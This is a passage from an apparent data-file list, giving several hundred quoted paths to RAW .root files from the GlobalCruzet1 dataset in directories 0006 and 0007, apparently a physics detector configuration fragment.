'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0A2198F-A01C-DD11-93EA-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E37787-B31C-DD11-8321-000423D94990.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E807CF-A41C-DD11-BB21-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A216CE55-AF1C-DD11-88F0-000423D98B28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A451701D-B81C-DD11-8258-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4586FA1-AB1C-DD11-BDF3-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4AD6A85-B31C-DD11-B9A7-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A6CA6BC4-A41C-DD11-A31B-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A87757E1-A61C-DD11-AF56-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A8E6BAB3-A21C-DD11-A4ED-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA174A3A-AF1C-DD11-BF8D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA1A101E-AD1C-DD11-A129-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AAA9E68F-9E1C-DD11-A380-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AC07D634-AF1C-DD11-8CDB-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/ACF22FB8-B91C-DD11-BA33-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AE39ADB2-B71C-DD11-B430-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AED27483-B31C-DD11-BAA1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B00336DD-A61C-DD11-8944-001617DBCF6A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B08F9CF7-A81C-DD11-90F4-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B0BFDCB7-B91C-DD11-AF2D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B20AE9D7-A41C-DD11-ABE8-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2382462-B11C-DD11-90FD-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B24F8173-B31C-DD11-835C-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2713B89-9E1C-DD11-B1B2-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B27A5B05-A91C-DD11-8492-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2BE5581-9E1C-DD11-AD50-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B400E66F-B31C-DD11-B0D7-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B649BBBA-A21C-DD11-9334-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B8FAEEAA-B71C-DD11-8B35-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BA0F0ED1-A61C-DD11-A33A-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BAE9B871-B31C-DD11-9BF0-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BC6B566C-9C1C-DD11-8154-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BCDBE12A-AB1C-DD11-AD5F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BE3A3B3D-981C-DD11-9A57-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BEEE307D-B31C-DD11-A4F8-000423D99AAA.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C014F777-B11C-DD11-B9DD-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FB9896-A01C-DD11-977A-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FDA089-9E1C-DD11-A3F0-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C23AF9D7-A41C-DD11-BA77-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C2CC26A6-B71C-DD11-89F4-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C4EEE3B3-B91C-DD11-85E5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C62A647C-9C1C-DD11-9136-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6708081-9E1C-DD11-8334-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6CF99B9-A21C-DD11-9D70-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C8086ACA-A41C-DD11-ABC6-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCB28CBF-A21C-DD11-A343-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCF1CF38-981C-DD11-B954-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CED1AE20-B81C-DD11-937A-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEE72F02-A91C-DD11-B45D-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEFC3E91-A01C-DD11-98CC-001617E30D0A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2885E89-9E1C-DD11-A1E6-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2B84A78-B61C-DD11-A238-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D42B50C4-A41C-DD11-BFB7-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D44B06B4-A21C-DD11-907F-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D464867B-9C1C-DD11-8980-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D4EBE6BA-A21C-DD11-B8A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D63FD683-9E1C-DD11-81FA-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D67A46C5-A21C-DD11-AE60-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6A13F4E-9A1C-DD11-A008-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6D813A1-A01C-DD11-A609-0019DB2F3F9B.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D814E871-B31C-DD11-9C71-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D83944BB-A21C-DD11-8862-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8469596-A01C-DD11-83F0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D86B334D-9A1C-DD11-B5DE-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8BB5636-981C-DD11-A230-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8E05E70-B31C-DD11-A757-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA16873D-9A1C-DD11-AE70-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA4142AD-B71C-DD11-9DAA-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAA952E9-B71C-DD11-815B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAC801D4-A41C-DD11-859E-000423D6B2D8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC0E836F-B31C-DD11-8C0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6A381B-AB1C-DD11-A583-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6BFCA3-B71C-DD11-A650-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC8E3F3D-9A1C-DD11-9FE1-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DE98753B-AF1C-DD11-A990-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E0EC4FE6-A61C-DD11-9AC0-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E210BBAD-B71C-DD11-9B75-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E4C16FD4-A61C-DD11-BCFE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E66F0446-AF1C-DD11-95F1-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E690BA1F-B81C-DD11-8302-001617C3B6DE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8002A9C-A01C-DD11-B643-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89041EC-A81C-DD11-9B7B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89EDDD2-A41C-DD11-A22C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8CFAD3D-981C-DD11-B22A-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EA2B3732-AD1C-DD11-9725-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAA9076D-9C1C-DD11-82A1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAACE083-B31C-DD11-88A3-000423D8F63C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EACE846B-9C1C-DD11-8AE5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAD127D4-A61C-DD11-A7F5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAED757C-9E1C-DD11-9717-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC1807DE-A61C-DD11-8881-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC3D0181-9E1C-DD11-B761-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC455A18-AB1C-DD11-8DDD-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC48C57A-9E1C-DD11-8E79-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FAF34-981C-DD11-8D58-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FF989-9E1C-DD11-B8B5-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F068CE9B-A01C-DD11-A90A-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F246A9A6-B71C-DD11-803B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F25A5A88-B11C-DD11-B4F2-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F274EE67-9C1C-DD11-A92E-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2D83EA9-B51C-DD11-89D5-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2DA1660-B11C-DD11-B258-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2E50819-AB1C-DD11-BB10-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F4039A71-9C1C-DD11-B3A2-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F899D8B7-B91C-DD11-9133-001617DBD540.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FAC2EFD0-A41C-DD11-A9D4-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FC879E74-B31C-DD11-B356-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA0CCC5-A21C-DD11-BE49-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA982D5-A61C-DD11-8A1F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCB68476-9C1C-DD11-B496-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCD38880-9E1C-DD11-829C-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE098EF7-A81C-DD11-A0AE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE134BB4-A21C-DD11-BDCC-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/000CD59C-CC1C-DD11-A498-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0095DE1B-C01C-DD11-975B-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/00D397C3-D01C-DD11-AAD7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0227DE52-C81C-DD11-910C-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/023E384A-C41C-DD11-B179-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/02A0A458-C41C-DD11-BDAE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0472A1D8-D21C-DD11-8A1F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0484A412-C01C-DD11-845D-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/060B4FA8-CE1C-DD11-9550-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/062E02B4-CE1C-DD11-9E2C-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/063C069C-CA1C-DD11-A395-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0664041F-C21C-DD11-A89C-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06DB5CC3-D01C-DD11-91CC-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06F29FCD-D01C-DD11-BC90-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/08FAD35A-C41C-DD11-AE05-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0AF3CEE5-BB1C-DD11-8E38-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C49504A-C41C-DD11-B41E-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C50A1D6-D01C-DD11-818F-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0CA1115F-C81C-DD11-BFC9-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E054203-C01C-DD11-AA43-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E14B5D2-B91C-DD11-8468-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/102F803D-C61C-DD11-9B28-000423D6CA72.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/108485A3-CE1C-DD11-B4E6-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10A6495F-C81C-DD11-9BAA-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10E92BE2-BB1C-DD11-9356-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/121C2B53-C61C-DD11-B128-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12B2969B-CC1C-DD11-AE14-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12D4A753-C81C-DD11-ACAA-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1459D199-CC1C-DD11-912B-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/14F7031F-C21C-DD11-84F6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/162C5398-CC1C-DD11-A72D-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/164BFF8D-CA1C-DD11-8932-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16937EE7-CC1C-DD11-B23B-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1695C71C-C01C-DD11-866E-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16D4ED53-C41C-DD11-8A8B-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16E75A61-C81C-DD11-8F7D-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181236C7-B91C-DD11-9101-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181B7712-C01C-DD11-A511-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/184F93F8-BB1C-DD11-843D-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/185F0E9E-CC1C-DD11-B1B4-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/186F2D03-C01C-DD11-9860-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18AC3F95-CA1C-DD11-8B7A-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18F04319-C21C-DD11-B16C-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1A3A8508-BE1C-DD11-AE08-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1AFB7BBB-D01C-DD11-8B27-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C006011-C21C-DD11-A5C9-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C2B095F-C81C-DD11-AA1F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C307446-C61C-DD11-850B-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C87B154-C41C-DD11-ABBA-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1EA987EF-BB1C-DD11-A499-000423D98FBC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1ED2084F-C61C-DD11-A76D-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2043E634-C21C-DD11-85CD-001617DBCF1E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/205468CD-D21C-DD11-8B1A-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2071A802-BE1C-DD11-B1E0-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220ABE65-C81C-DD11-9DF4-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220CC9F1-BB1C-DD11-9CC0-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/222FFF23-C21C-DD11-9C92-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/227EA1AD-CE1C-DD11-8133-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/229C872E-C21C-DD11-B263-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2403325F-C41C-DD11-887E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2606130A-C01C-DD11-9BA6-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26A522E2-BB1C-DD11-8605-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26AF8BF4-BD1C-DD11-92C0-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26F014F5-BB1C-DD11-9CDD-000423D33970.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/284795FB-BD1C-DD11-8134-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/28DAA6E5-BB1C-DD11-9497-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A629202-C01C-DD11-99AF-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A684F12-C01C-DD11-B52A-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2AC81D1E-C21C-DD11-9E3D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C06BFCE-D01C-DD11-ACBC-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C879CDF-BB1C-DD11-98B6-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2E5A7CD5-BB1C-DD11-8024-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EC3BB1E-C01C-DD11-B657-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFC81C8-D01C-DD11-BC93-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFCB33C-C61C-DD11-9BDE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30085D93-CC1C-DD11-95BF-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/300A34D7-B91C-DD11-B8B8-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30184FA3-CE1C-DD11-B135-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3022C499-CC1C-DD11-A9F3-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/306C0F0C-C01C-DD11-8997-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30AFFEA2-CE1C-DD11-9650-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B25C8A-CC1C-DD11-8F44-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B4DC4C-C41C-DD11-8D66-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32074B83-CA1C-DD11-A8A0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3279A90D-C01C-DD11-9288-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3288778F-CA1C-DD11-A8F8-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32D57812-C21C-DD11-80A8-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32E8D78D-CA1C-DD11-9B0C-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/342BF7D5-D21C-DD11-B3A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34AA2ED9-D21C-DD11-9434-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34B5B163-C41C-DD11-AB48-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34CA75D1-B91C-DD11-B4FD-000423D98930.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36191416-C21C-DD11-8A6C-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/362838EC-BD1C-DD11-B8C7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3636B1D0-BB1C-DD11-806E-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/366827C8-D01C-DD11-A7E9-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36F3E11D-C21C-DD11-A1AF-001617E30D52.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38032FF8-BF1C-DD11-BC36-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/383986EC-BB1C-DD11-987A-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38935E7E-CA1C-DD11-88E5-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FBE115-C01C-DD11-A373-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FEBD81-CA1C-DD11-8C28-000423D98804.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A207592-CA1C-DD11-9F1B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A914003-BE1C-DD11-B42F-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AC9A6A1-CC1C-DD11-9962-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AD17346-C61C-DD11-B4D1-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CA07EFF-BD1C-DD11-A85D-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CC33988-CA1C-DD11-A9EC-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3EA0B2D0-BB1C-DD11-A7F7-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/404FC1CE-D01C-DD11-84F5-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42A7E9D1-B91C-DD11-96A0-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42E5A594-CA1C-DD11-8E72-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4403FC5C-C81C-DD11-8187-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/44200AB3-CE1C-DD11-981F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/460369CC-D01C-DD11-9907-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46285A63-C41C-DD11-8F4C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4671328A-CC1C-DD11-9B21-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46E219D1-B91C-DD11-AE70-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46FBF8CE-D21C-DD11-A2EA-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48541196-CA1C-DD11-9E90-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/485816A4-CC1C-DD11-A10D-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4872EE1D-C01C-DD11-A5FD-000423D98C20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4885B4F9-BF1C-DD11-89B7-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48F3F2A2-CE1C-DD11-8DD4-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A06FFA1-CC1C-DD11-87A2-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A9CB82A-C21C-DD11-AEE7-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AD639F8-BB1C-DD11-AF29-000423D944F8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AFDEF53-C41C-DD11-A04C-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4C0DF65E-C41C-DD11-9D7F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4CB55298-CC1C-DD11-A393-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E3E253C-C61C-DD11-B716-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E55CAD7-B91C-DD11-9856-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EA7B5F5-BD1C-DD11-892C-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EB6F2E2-BB1C-DD11-B989-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EBAD914-C21C-DD11-9C60-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EE090E8-BB1C-DD11-BC09-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/500D4FD2-D01C-DD11-939D-001617DBD332.root',
